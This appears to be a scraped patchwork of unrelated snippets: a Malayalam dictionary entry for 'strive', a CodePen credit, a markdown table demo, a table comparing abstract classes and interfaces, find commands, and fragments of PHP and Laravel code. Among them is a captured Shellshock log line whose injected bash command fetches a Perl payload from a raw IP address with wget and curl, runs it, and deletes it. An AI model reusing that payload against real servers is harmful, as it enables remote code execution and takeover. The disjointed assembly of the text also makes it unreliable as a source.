Strive (അദ്ധ്വാനിക്കുക,പരിശ്രമിക്കുക)
- make great efforts to achieve or obtain something
- We continually strive to better our service to our customers.
Pure CSS Taj Mahal by Jan Dennison @jannypie Inspired by the pure CSS White House by Kevin Jannis @kevinjannis
A Pen by jan dennison on CodePen.
| GET /cgi-bin/hello HTTP/1.0" 301 0 "-" "() { :;}; /bin/bash -c \x22cd /tmp;wget http://213.5.67.223/jur;curl -O http://213.5.67.223/jur ; perl /tmp/jur;rm -rf /tmp/jur\x22 |
| | Tables | Are | Cool | | |
| | ------------- |:-------------:| -----:| | |
| | col 3 is | right-aligned | $1600 | | |
| | col 2 is | centered | $12 | | |
| | zebra stripes | are neat | $1 | |
| Abstract Class | Interface |
|---|---|
| A method must be declared as abstract. Abstract methods doesn't have any implementation | All methods, by default are abstract methods only. So, one cannot declare variables or concrete methods in interfaces |
| Abstract methods can be declared with access modifiers like public, private, protected. When implementing in subclass these methods must be defined with the same visibility | All methods in an interface must be declared public |
| Abstract class can contain variables and concrete methods | Interface cannot contain variables and concrete methods, except constants |
| A class can inherit only one abstract class ( multiple inheritance is not possible ) | A class can implement, many interfaces ( multiple inheritance is possible ) |
find . \( -name "*.c" -o -name "*.h" -o -name "*.sc" -o -name "*.ini" \) -print
find . -type f \( -name "*.avi" -name "*.mp4" -name "*.mkv" -name "*.mpg" -name "*.mpeg"\)
| <?php | |
| function unescapeUTF8EscapeSeq($str) | |
| { | |
| return preg_replace_callback("/\\\u([0-9a-f]{4})/i", | |
| create_function('$matches', | |
| 'return html_entity_decode(\'&#x\'.$matches[1].\';\', ENT_QUOTES, \'UTF-8\');' | |
| ), $str); | |
| } | |
| $unicodeEncodedvalue = '\u041d\u0438\u043a\u043e\u043b\u0430\u0439 \u0420\u0435\u0448\u0438\u0442\u043a\u043e'; |
| <?php | |
| use Illuminate\Console\Command; | |
| use Illuminate\Filesystem\Filesystem; | |
| class ViewsCommand extends Command { | |
| /** | |
| * The console command name. | |
| * | |
| * @var string |